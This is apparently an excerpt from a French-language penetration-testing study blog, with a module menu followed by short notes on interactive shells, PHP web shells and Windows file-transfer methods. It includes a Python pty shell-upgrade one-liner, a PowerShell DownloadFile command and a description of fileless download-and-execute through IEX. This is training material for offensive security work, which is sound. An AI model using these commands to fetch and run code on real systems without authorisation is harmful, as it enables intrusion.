Posts
Modules Penetration Testing Process Getting Started Network Enumeration with Nmap Footprinting Information Gathering - Web Edition Vulnerability Assessment File Transfers Shells & Payloads Using the Metasploit Framework Password Attacks Attacking Common Services Pivoting, Tunneling, and Port Forwarding Active Directory Enumeration & Attacks Using Web Proxies Attacking Web Applications with Ffuf Login Brute Forcing SQL Injection Fundamentals SQLMap Essentials Cross-Site Scripting (XSS) File Inclusion File Upload Attacks Command Injections Web Attacks Attacking Common Applications Linux Privilege Escalation Windows Privilege Escalation Documentation & Reporting Attacking Enterprise Networks ...
python -c 'import pty; pty.spawn("/bin/sh")' Génération de Shell interactifs Qu’est-ce qu’un Web Shell ? https://attack.mitre.org/techniques/T1505/003/ Les fonctions d’exécution système en PHP , telles que shell_exec(), exec(), system()et passthru(), peuvent être utilisées abusivement pour obtenir l’exécution de commandes.
Méthodes de transfert de fichiers Windows Méthode PowerShell DownloadFile Téléchargement de fichier (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>') PowerShell DownloadString – Méthode sans fichier Comme nous l’avons vu précédemment, les attaques sans fichier utilisent certaines fonctions du système d’exploitation pour télécharger la charge utile et l’exécuter directement. PowerShell peut également être utilisé pour réaliser des attaques sans fichier. Au lieu de télécharger un script PowerShell sur le disque, nous pouvons l’exécuter directement en mémoire à l’aide de l’ applet de commande Invoke-Expression ou de l’alias IEX. ...